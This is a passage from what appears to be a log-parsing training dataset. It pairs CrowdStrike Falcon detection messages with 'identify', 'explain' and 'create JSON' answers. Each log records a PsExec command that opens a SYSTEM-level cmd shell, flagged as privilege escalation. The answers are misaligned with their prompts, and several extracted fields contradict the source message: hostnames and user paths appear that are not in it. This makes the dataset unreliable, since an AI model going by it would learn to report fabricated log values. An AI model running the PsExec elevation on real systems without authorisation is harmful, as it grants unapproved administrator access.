\",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426\"},\"pattern_disposition\":0,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mstarkine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=185.193.34.232 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\\Device\\HarddiskVolume1\\Users\\charlie\\Downloads\\PSTools\\PsExec.exe ::: userName=charlie ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-08-29T18:24:34Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "185.193.34.232", "userName": "charlie" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\charlie\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\charlie\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=185.193.34.232 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\charlie\Downloads\PSTools\PsExec.exe ::: userName=charlie ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\charlie\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\charlie\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=185.193.34.232 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\charlie\Downloads\PSTools\PsExec.exe ::: userName=charlie ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com clientmac: 0edeb6ae9241 filehash: 078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b filename: PsExec.exe filepath: \Device\HarddiskVolume1\Users\INFRDEV-pentest\Downloads\PSTools\PsExec.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-08-29T18:24:34Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 185.193.34.232 userName: charlie
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\bob\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\bob\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=191.139.78.14 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\bob\Downloads\PSTools\PsExec.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch
{ "clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com", "clientmac": "0edeb6ae9241", "filehash": "078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b", "filename": "PsExec.exe", "filepath": "\\Device\\HarddiskVolume1\\Users\\INFRDEV-pentest\\Downloads\\PSTools\\PsExec.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-29T18:24:34Z\",\"template_instance_id\":\"1384\",\"behavior_id\":\"10447\",\"filename\":\"PsExec.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Users\\\\bob\\\\Downloads\\\\PSTools\\\\PsExec.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Users\\\\bob\\\\Downloads\\\\PSTools\\\\PsExec.exe\\\" -i -s cmd.exe\",\"scenario\":\"suspicious_activity\",\"objective\":\"Gain Access\",\"tactic\":\"Privilege Escalation\",\"tactic_id\":\"TA0004\",\"technique\":\"Abuse Elevation Control Mechanism\",\"technique_id\":\"T1548\",\"display_name\":\"SuspiciousPrivEsc\",\"description\":\"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.\",\"severity\":30,\"confidence\":80,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"bob\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-94611\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738\",\"sha256\":\"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b\",\"md5\":\"24a648a48741b1ac809e47b9543c6f12\",\"parent_details\":{\"parent_sha256\":\"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\"parent_md5\":\"7353f60b1739074eb17c5f4dddefe239\",\"parent_cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426\"},\"pattern_disposition\":0,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_moscorpine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=191.139.78.14 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\\Device\\HarddiskVolume1\\Users\\bob\\Downloads\\PSTools\\PsExec.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-08-29T18:24:34Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "191.139.78.14", "userName": "bob" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\bob\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\bob\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=191.139.78.14 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\bob\Downloads\PSTools\PsExec.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\bob\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\bob\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=191.139.78.14 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\bob\Downloads\PSTools\PsExec.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com clientmac: 0edeb6ae9241 filehash: 078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b filename: PsExec.exe filepath: \Device\HarddiskVolume1\Users\INFRDEV-pentest\Downloads\PSTools\PsExec.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-08-29T18:24:34Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 191.139.78.14 userName: bob
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\johndoe\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\johndoe\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=42.170.66.194 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\johndoe\Downloads\PSTools\PsExec.exe ::: userName=johndoe ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
{ "clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com", "clientmac": "0edeb6ae9241", "filehash": "078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b", "filename": "PsExec.exe", "filepath": "\\Device\\HarddiskVolume1\\Users\\INFRDEV-pentest\\Downloads\\PSTools\\PsExec.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-29T18:24:34Z\",\"template_instance_id\":\"1384\",\"behavior_id\":\"10447\",\"filename\":\"PsExec.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Users\\\\johndoe\\\\Downloads\\\\PSTools\\\\PsExec.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Users\\\\johndoe\\\\Downloads\\\\PSTools\\\\PsExec.exe\\\" -i -s cmd.exe\",\"scenario\":\"suspicious_activity\",\"objective\":\"Gain Access\",\"tactic\":\"Privilege Escalation\",\"tactic_id\":\"TA0004\",\"technique\":\"Abuse Elevation Control Mechanism\",\"technique_id\":\"T1548\",\"display_name\":\"SuspiciousPrivEsc\",\"description\":\"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.\",\"severity\":30,\"confidence\":80,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"johndoe\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-94611\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738\",\"sha256\":\"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b\",\"md5\":\"24a648a48741b1ac809e47b9543c6f12\",\"parent_details\":{\"parent_sha256\":\"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\"parent_md5\":\"7353f60b1739074eb17c5f4dddefe239\",\"parent_cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426\"},\"pattern_disposition\":0,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mstarkine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=42.170.66.194 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\\Device\\HarddiskVolume1\\Users\\johndoe\\Downloads\\PSTools\\PsExec.exe ::: userName=johndoe ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-08-29T18:24:34Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "42.170.66.194", "userName": "johndoe" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\johndoe\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\johndoe\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=42.170.66.194 ::: 